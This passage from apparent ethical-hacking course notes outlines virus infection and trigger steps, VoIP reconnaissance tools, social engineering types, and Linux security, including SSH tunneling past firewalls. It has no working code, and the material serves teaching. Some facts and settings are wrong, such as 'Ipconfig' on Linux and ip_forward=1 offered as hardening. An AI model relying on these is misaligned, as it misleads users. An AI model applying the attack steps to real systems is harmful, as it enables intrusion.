Boot Viruses
Program Viruses
Multipartite Viruses
Stealth Viruses
Polymorphic Viruses
Macro Viruses
Active X
FAT
COM Viruses
Virus Infection
STEP I- Finding file to infect
Efficiency in finding an file for infection or targeted for infection increases the performance of
viruses.
STEP II- Check Virus Infection Criteria
Check whether file and program should be infected or not.
STEP III- Check for previous Infection
Check whether the file is already infected or not.
STEP IV- Infect the File
Save the file attributes; Change the file attribute to nothing; Open the file in read/write mode; Run
virus routines.
STEP V- Covering Tracks
Restore file attributes to avoid detection.
Trigger Mechanism
Set a logical condition for activation of virus; Are of following types:
Counter Trigger
KeyStroke Trigger
Time Trigger
Replication Trigger
System Parameter Trigger
Null Trigger
12. MOBILE PHONE & VOIP HACKING
Introduction
Voice Over Internet Protocol (VOIP) refers to transmission of voice over IP based networks.
Also known as ―Packet Telephony‖. It uses IP protocol to route voice traffic. Voice is compressed
using CODECS hence bandwidth is utilized efficiently. Renowned for its low cost and
advantageous to customers in case of long distance calls.
VOIP Hacking Steps
Footprinting
Scanning
Enumeration
Exploiting the network
Footprinting
Public web site research; Google hacking; WHOIS & DNS analysis. Information includes:
Organizational Structure and corporate locations
Help & Tech Support
Job Listings
Domain name Lookup
Phone numbers and extensions
VoIP vendors press releases and case studies
Resumes
Mailing lists and local user group postings
Web based VoIP logins
Scanning
Collect an active target lists and figure out what devices are accessible on the network. Ping large
number of IP address and wait for any responses.
Methods to Ping:
ICMP ping sweeps
ARP pings
TCP ping scans
SNMP sweeps
Determine the vulnerabilities present on the target host or devices.
Method to scan active services:
TCP scan
UDP scan
Determine the type of devices, hosts by OS and firmware types.
Method to identify host/devices:
Stack Fingerpinting
Tools to be used:
Nmap
Xprobe2
Arkin
Queso
Snacktime
Enumeration
Extract user names using Win2k enumeration.
Gather information from the host using null sessions.
Perform windows enumeration using SuperScan4.
Get the users‘ account using GetAcct.
Perform an SNMP port scan using SNScanV1.05.
Exploiting the network
Launch various attacks based on vulnerability existing
Compromise an network node
Gain access to a network
Now access the network and start sniffing
Intercept through VoIP signaling Manipulation to insert Rouge Applications.
13. SOCIAL ENGINEERING
Social Engineering is the art of manipulation and the skill of exploiting human weakness. A social
engineering attack may occur over the phone, by e-mail, by a personal visit, or through the
computer. The intent of the attack is to acquire information, such as user IDs and passwords.
While these attacks may seem relatively low-tech, they target an organization‘s weakest link, its
employees.
Common Types of Social Engineering
Social engineering attacks can be divided into two categories:
Human Based
Computer Based
Human Based Impersonation
Human based attacks are relatively low-tech and are reminiscent of a scam or something you would
expect from a con man. The six primary types of human based social engineering are listed below:
Important User
Tech Support
Third Party Authorization
In Person
Dumpster Diving
Shoulder Surfing
Computer Based Impersonation
This type of social engineering attack attempts to use a computer as the interface. These attacks can
come in any of the following forms:
Mail Attachments
Popup Windows
Website Faking
SPAM
Social Engineering Prevention
Defense requires a good offense. Employees need to be made aware of social engineering attacks.
They must also be given procedures that can be used to verify an individual‘s identity. Training
and education must be continual to remind employees to protect valuable resources. The following
three steps can help protect your organization from this easy to launch, hard to prevent attack:
Policies and Procedures
Training
Employee Education
14. LINUX HACKING
Linux Basics
Linux is case sensitive
Linux filenames can contain maximum 256 characters
In Linux file extensions don‘t play big role and are not necessary
Its file system is hierarchical
In Linux we don‘t have any drive letters, instead they are recognized as /dev/sda1, /dev/sda2
Linux root directory is denoted by /
Nano, vi, vim, pico are common command line editors which are widely used
CP is command to copy a file
MV is command to move and rename a file
Mkdir is command to create a directory
Rmdir is command to remove empty directories
Rm is command to delete files and folders
Find is a command to find the files
In Linux we have three types of user
Root user, Service User, Normal User
Root user will always have uid:gid=0:0
Normal User will always have uid:gid starting from 500:500
Service Users uid:gid always exists between 0 – 500
Service user are not allowed to login by default where as root and normal user can login
User‘s User Id, Group Id, home directory and shell is allocated to them in the /etc/passwd file
Linux password are stored in MD5 hashes in /etc/shadow file
ARP is a command which is mostly used to for checking existing Ethernet connectivity and
IP address
Ipconfig is command line tool which checks all interface cards and shows information
regarding them
PS is a command which lists all existing process on the server
Route is a command which lists all routing tables for your server
Shred is a command which deletes a file securely by overwriting its contents
Why is Linux Hacked?
Linux is used on more than 80% of all web servers on internet. Finding vulnerability in such a
popular OS or its related applications for web servers would mean that you can virtually hack into
any website on the internet, depending upon the type of vulnerability. Linux users generally use no
antivirus program which makes it more difficult to detect if a Linux machine is compromised or
not. For servers a lot of rootkit scanners and software firewalls are available, however they are not
very easy to use and configure as Linux is not very user friendly for non technical people.
Recent Vulnerabilities
Kerberos Vulnerability-[USN-999-1]
LVM2 Vulnerability-[USN-1001-1]
Apache Vulnerability-[USN-990-2]
Dpkg Vulnerability-[USN-986-3]
Secure your Linux
Linux has lots of inbuilt processes to secure itself
/etc/sysctl.conf- sysctl.conf is used to alter the parameters of Linux Kernel to make it more
secure
Apply Following configuration
Net/ipv4/conf/all/rp_filter=1
Net/ipv4/conf/all/log_martians=1
Net/ipv4/conf/all/send_redirects=0
Net/ipv4/conf/all/accept_source_route=0
Net/ipv4/conf/all/accept_redirects=0
Net/ipv4/tcp_syncookies=1
Net/ipv4/icmp_echo_ignore_broadcast=1
Net/ipv4/ip_forward=1
Security Enhanced Linux (SELinux)
Security Enhanced Linux(SELinux) is a Linux feature that provides a mechanism for
supporting access control security policies
SELinux is a not a separate distribution in itself but a set of modifications which are applied
to Linux Kernel to make it more secure.
SELinux has been integrated into version 2.6 series of Linux Kernel and separate patches are
now unnecessary.
Backtrack
BackTrack is a Linux distribution as the world‘s most popular security distribution for
penetration testing and vulnerability assessment.
The BackTrack distribution originated from the merger of two formerely competing
distributions which focused on penetration testing.
WHAX: a SLAX based Linux distribution.
Auditor Security Collection: a Live CD based on Knoppix.
The overlap with Auditor and WHAX in purpose tools collection partly led to merger.
Patch Management
Patch Management is a part of the job role of system administrator. The task involves
applying and Testing multiple patches on the available computer systems. Patch Management
tasks include
Maintaining the set of available patches from the vendor
Deciding what patches necessary to apply first on the their nature as critical or optional
Ensuring that patches are successfully installed
And testing the system for stability after installation
There are lot of automated tools available in the market to automate this process including
the RingMaster‘s Automated Patch Management and Gilbrator‘s Everguard.
SSH Connection
SSH is a protocol which enables remote administration of computers over encrypted
connections. An SSH client is used to log in to remote machine and allows the execution of
commands on that machine.
RSH and Telnet also allow remote administration of computers in a similar way like SSH
but these protocols are insecure and transfer data in plain text over the network.
SSH and Openssh for Linux and putty for windows can be used as a SSH client, to
communicate with SSH server.
SSH Tunneling
SSH Tunneling can be used to bypass the security restriction imposed by a proxy server and
firewall on a network. During tunneling the SSH client would be used to send the data meant
for other protocols such as SMB or HTTP.
For SSH tunneling we will be requiring two machines. One inside the restricted network and
the other outside the network. The system outside the restricted network should be
configured as a server and the system inside the restricted network should be configured as
SSH client.
Eg We have a situation where port 22 is open in restricted network and all the other services
like FTP, HTTP & SMTP are blocked. Here in this scenario we can use SSH tunneling to
browse the normal internet by using a SSH server as a proxy which fetches the web pages for
my client and send me the data wrapped in SSH protocol which is allowed in the network.
SSH Tunneling can also be used to transfer unencrypted network traffic between the SSH
client and Server.
Advantages of Linux
COST- Being a open source project as it comes under GNU general public license. Cost is
the major factor why Linux is used in more than 80% servers throughout the world.
SECURITY- Linux is also considered as more secure application than windows as most of
the malware actually target windows based computers. Linux has better user permissions
model which makes it more secure.
STABILITY- Linux is quite stable in comparison to windows.
Disadvantages of Linux
Due to being open source, Linux source code or its associated applications source codes are
easily available which makes it easier to discover security vulnerabilities and flaw. They can
be exploited in the wild by the hackers.
HARDWARE COMPATIBILITY ISSUE- Linux does not support latest hardware in some
cases due to which it becomes very uncomfortable for a normal desktop user to use Linux as
a main OS over windows.
Linux is not very easy to use for normal people as it requires extensive knowledge of
operating and networking to use it comfortably. So, it can be a bit Hassle for a non technical
person.